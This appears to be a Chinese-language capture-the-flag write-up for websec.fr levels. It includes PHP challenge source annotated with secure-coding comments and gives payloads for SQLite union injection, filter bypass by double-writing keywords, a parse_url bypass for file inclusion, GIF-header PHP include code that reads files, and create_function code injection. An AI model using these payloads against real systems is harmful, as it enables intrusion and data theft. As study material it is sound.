WEBSEC.FR


国外的一个平台。看到队里师傅之前说有很多骚套路,正好BUU的题不会了,来做一下

babysteps

Level01

sqlite注入。

1 order by 2
#字段数为2
-1 union select 1,2
#1,2字段可回显
-1 union select 1,name from sqlite_master WHERE type='table'
#得到表名users
-1 union select 1,sql from sqlite_master WHERE type='table'
#得到表结构CREATE TABLE users(id int(7), username varchar(255), password varchar(255))
-1 union select 1,password from users where id=1
#得到Flag

Level04

给了源码

<?php
// websec.fr Level04 index.php as shown in the challenge; annotated for review.
// The cookie is deserialised before anything else runs, so the cookie value —
// entirely client-controlled — decides which class gets instantiated and with
// what property values.
include 'connect.php';
$sql = new SQL();
$sql->connect();
$sql->query = 'SELECT username FROM users WHERE id=';
if (isset ($_COOKIE['leet_hax0r'])) {
    // SECURITY: unserialize() on cookie data. Any class loaded by this script
    // (including SQL from connect.php, whose __destruct() executes $query) can
    // be instantiated with attacker-chosen properties. Keep session state in
    // JSON (json_decode), or at minimum call
    // unserialize($s, ['allowed_classes' => false]) and sign the cookie so it
    // cannot be forged.
    $sess_data = unserialize (base64_decode ($_COOKIE['leet_hax0r']));
    try {
        // '!=' is a loose comparison: a non-string 'ip' value is coerced before
        // comparing. '!==' against a string is the safer form.
        if (is_array($sess_data) && $sess_data['ip'] != $_SERVER['REMOTE_ADDR']) {
            die('CANT HACK US!!!');
        }
    } catch(Exception $e) {
        // Nothing in the try block throws an Exception in stock PHP (a missing
        // 'ip' key is only a warning), so this catch is effectively dead code.
        echo $e;
    }
} else {
    $cookie = base64_encode (serialize (array ( 'ip' => $_SERVER['REMOTE_ADDR']))) ;
    setcookie ('leet_hax0r', $cookie, time () + (86400 * 30));
}
if (isset ($_REQUEST['id']) && is_numeric ($_REQUEST['id'])) {
    try {
        // is_numeric() narrows what can be appended, but the query is still
        // built by string concatenation; a prepared statement with a bound
        // parameter is the correct control. Note that the query is never run
        // in this file — SQL::__destruct() executes it at script end.
        $sql->query .= $_REQUEST['id'];
    } catch(Exception $e) {
        // String concatenation does not throw; this catch is also dead code.
        echo ' Invalid query';
    }
}
<?php
class SQL {
    // connect.php from Level04, as shown in the challenge; annotated for review.
    // Both properties are public, so a deserialised instance arrives with
    // attacker-chosen values, and __destruct() below executes $query without
    // any further check.
    public $query = '';
    public $conn;
    public function __construct() {
    }
    // Opens the SQLite database read-only; $conn stays unset until this runs.
    public function connect() {
        $this->conn = new SQLite3 ("database.db", SQLITE3_OPEN_READONLY);
    }
    // Setter for the raw query string (index.php does not use it; it appends
    // to $query directly).
    public function SQL_query($query) {
        $this->query = $query;
    }
    // Runs $this->query verbatim; returns an SQLite3Result, or false on failure.
    public function execute() {
        return $this->conn->query ($this->query);
    }
    // Runs when the object is destroyed (at script end for the instance created
    // in index.php, or when a deserialised instance goes out of scope). Because
    // it lazily connects and then executes whatever $query holds, any
    // unserialize() that yields an SQL object becomes a query execution — the
    // gadget this level is built around. A destructor should not act on
    // untrusted state: drop the execute() call here, and/or make the class
    // refuse deserialisation (a __wakeup() / __unserialize() that throws).
    public function __destruct() {
        if (!isset ($this->conn)) {
            $this->connect ();
        }
        $ret = $this->execute ();
        if (false !== $ret) {
            while (false !== ($row = $ret->fetchArray (SQLITE3_ASSOC))) {
                // The loop body is an empty echo in this copy; the row output
                // was presumably stripped when the source was pasted.
                echo '';
            }
        }
    }
}

审计后发现：脚本先对 cookie 中的数据做反序列化，
然后才进入 SQL 类。
据此构造一下就好了

替换cookie得到flag


Level17

数组一把梭
strcasecmp() 函数遇到数组参数时返回 0，满足判断条件


Level25

<?php
// websec.fr Level25 as shown in the challenge; annotated for review.
// Two different parsers look at the same request: the filter below inspects
// parse_url()'s view of the query string, while the include uses $_GET, which
// PHP populated separately. Whenever the two disagree the filter is bypassed.
// parse_url() returns false for a URL it cannot parse; false['query'] is null,
// and parse_str(null, $query) leaves $query empty, so the loop never runs.
parse_str(parse_url($_SERVER['REQUEST_URI'])['query'], $query);
foreach ($query as $k => $v) {
    // Blocklist on the value only (case-insensitive 'flag' substring). A
    // blocklist on one spelling is brittle; an allowlist of page names is the
    // robust control.
    if (stripos($v, 'flag') !== false)
        die('You are not allowed to get the flag, sorry :/');
}
// Local file inclusion: the path comes straight from $_GET['page'] and the
// appended '.txt' does not make it safe. Validate $_GET['page'] against a
// fixed list (in_array($page, $pages, true)) before including anything.
include $_GET['page'] . '.txt';

问题出在 parse_url 函数上：如果它遇到不合法（无法解析）的地址就会返回 false
payload:page=flag&:80
或者使用
http://websec.fr///level25/index.php?page=flag


Level28

<?php
// websec.fr Level28 as shown in the challenge; annotated for review.
if(isset($_POST['submit'])) {
    if ($_FILES['flag_file']['size'] > 4096) {
    die('Your file is too heavy.');
  }
  // The upload is copied into the web root under a name derived only from the
  // client IP, with a .php extension. Between file_put_contents() below and
  // unlink() at the end the file exists on disk — a time-of-check/time-of-use
  // window, widened to at least one second by sleep(1) on the failure path.
  // Mitigation: never write uploads under the document root with an executable
  // extension; compare md5($flagfilecontent) in memory instead of via a temp
  // file, and if a file really is needed use tempnam() outside the web root.
  $filename = md5($_SERVER['REMOTE_ADDR']) . '.php';
  $fp = fopen($_FILES['flag_file']['tmp_name'], 'r');
  // Neither return value is checked: fopen() can return false, and filesize()
  // is 0 for an empty upload, in which case $flagfilecontent is '' or false.
  $flagfilecontent = fread($fp, filesize($_FILES['flag_file']['tmp_name']));
  @fclose($fp);
    file_put_contents($filename, $flagfilecontent);
  // Two conditions: the content hash must match flag.php, and a loose '=='
  // check that the submitted checksum equals its own crc32(). The latter
  // compares a string with an int, so PHP's numeric-string coercion applies;
  // it should be '===' on a normalised type.
  if (md5_file($filename) === md5_file('flag.php') && $_POST['checksum'] == crc32($_POST['checksum'])) {
    include($filename);  // it contains the $flag variable
    } else {
        $flag = "Nope, $filename is not the right file, sorry.";
        sleep(1);  // Deter bruteforce
    }
  unlink($filename);
}

一个条件竞争的题
没复现成功

easy

Level02

和 Level01 一样，只不过过滤了一些关键字（union、order、select、from、group、by），双写就行
-1 uniunionon seselectlect 1,password frfromom users where id=1


Level08

文件包含,会检测gif头

GIF89a
<?php /* The leading GIF89a bytes satisfy a magic-bytes check; include still executes the PHP that follows, so magic bytes alone do not make a user-supplied file safe to include. */ var_dump(scandir('./')); ?>

发现了flag.txt
读一下就行

GIF89a
<?php /* Same magic-bytes prefix as above; the included code runs with the web server's file permissions, which is why included paths must come from an allowlist, never from the request. */ var_dump(file_get_contents('flag.txt')); ?>

Level10

给了源码

<?php
// websec.fr Level10 as shown in the challenge; annotated for review.
// $flag is not defined in this excerpt — presumably set by an earlier include.
if (isset ($_REQUEST['f']) && isset ($_REQUEST['hash'])) {
    $file = $_REQUEST['f'];
    $request = $_REQUEST['hash'];
    // Truncated keyed hash: the first 8 hex characters (32 bits) of
    // md5($flag . $file . $flag).
    $hash = substr (md5 ($flag . $file . $flag), 0, 8);
    echo '';
    // SECURITY: '==' between two strings that both look numeric compares them
    // as numbers (PHP numeric-string rules), so distinct hex prefixes can
    // compare equal. Use hash_equals($hash, (string) $request): strict and
    // constant-time. Once the check passes, $file is also passed to
    // show_source() unrestricted; an allowlist of readable files is the real
    // control.
    if ($request == $hash) {
        show_source ($file);
    } else {
        echo 'Permission denied!';
    }
     echo '';
}

发现会截取md5($flag.$file.$flag)的前八位,如果比较正确就输出文件
然后就有点没思路了,flag未知,爆破不太合理。。
看一眼WP吧!
好像是个弱类型的题
暂时还没复现出来


Level11

暂时不会。。


Level15

create_function函数漏洞
之前写过了 不细说了
;}echo($flag);//
